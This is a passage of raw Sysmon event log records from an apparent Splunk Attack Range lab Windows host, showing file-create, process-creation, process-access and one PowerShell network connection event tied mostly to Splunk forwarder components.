Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CAE426CA78F2F3CCEF3130BC8A1079A3,SHA256=642F4706FBC9186493508986FC38F0FAA2C8E373D72194F176300BABE62865CB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084943Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:40.448{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=2DC20BB5B3863BA489687CAF77FF6259,SHA256=A9AC9AD419935E47BAAA6A548B5278161BE1EB1163691ACCEEC4AA9EDE355449,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084942Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:40.280{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F20B7A289698AC35C3635F50F7A87A77,SHA256=31DEA0EFD07D444DC78702A47BCD28C4AC52FF53A90A54C0454BC687EC7BAB69,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035084945Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:05.455{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56675-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035084944Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:41.295{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0C64D381CC82667442E6DCFF29B65D2F,SHA256=2AD02A37A303AF814FA266D3FBBD347207BAD9F5618AC9F02C9214A73C414AB5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084946Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:42.312{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=921DC789C2B55032CCF7187B1A657A4A,SHA256=AC9F41F9EB395B9DF9D34EBAA69905D9CB889F8E8B1BC62CA74E11BA602C08EB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035084956Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:43.714{B81B27B7-4ED7-613A-4E90-03000000C801}29001772C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084955Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:43.561{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-4ED7-613A-4E90-03000000C801}2900C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084954Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:43.561{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084953Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:43.561{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084952Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:43.561{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084951Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:43.561{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084950Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:43.561{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-4ED7-613A-4E90-03000000C801}2900C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035084949Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:43.561{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-4ED7-613A-4E90-03000000C801}2900C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035084948Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:43.546{B81B27B7-4ED7-613A-4E90-03000000C801}2900C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035084947Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:43.345{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1C18380DAAE895AC4E73C8414D8616FB,SHA256=D431431B73D914FE8660A76F06F5F29205EE38E0130DAE1D84E6E40780966B2B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035084976Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:44.959{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-4ED8-613A-5090-03000000C801}6436C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084975Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:44.959{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084974Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:44.959{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084973Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:44.959{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-4ED8-613A-5090-03000000C801}6436C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035084972Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:44.959{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084971Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:44.959{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084970Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:44.959{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-4ED8-613A-5090-03000000C801}6436C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035084969Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:44.944{B81B27B7-4ED8-613A-5090-03000000C801}6436C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035084968Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:44.575{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=316714ECACB1A7061660DDE173E5453B,SHA256=44826985AF8333EBF954FAA43920994E0F557DB25515E8ED4CF2A3FA876C70DB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084967Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:44.575{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E95CF0CB5A1DEBFE5687772FBC415104,SHA256=D1F5782D1F9A4C2349B01BA58521847FD9E9443C84546D50DB0312D46A774479,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035084966Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:44.413{B81B27B7-4ED8-613A-4F90-03000000C801}52566824C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000035084965Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:44.376{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=119A43B268F7532170DB175AC6551815,SHA256=8F7A2565FEFC97866EBFEDB05B17ED1213251C65CEE05866AB98545D64630DE9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035084964Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:44.260{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-4ED8-613A-4F90-03000000C801}5256C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084963Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:44.260{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084962Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:44.260{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084961Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:44.260{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084960Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:44.260{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084959Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 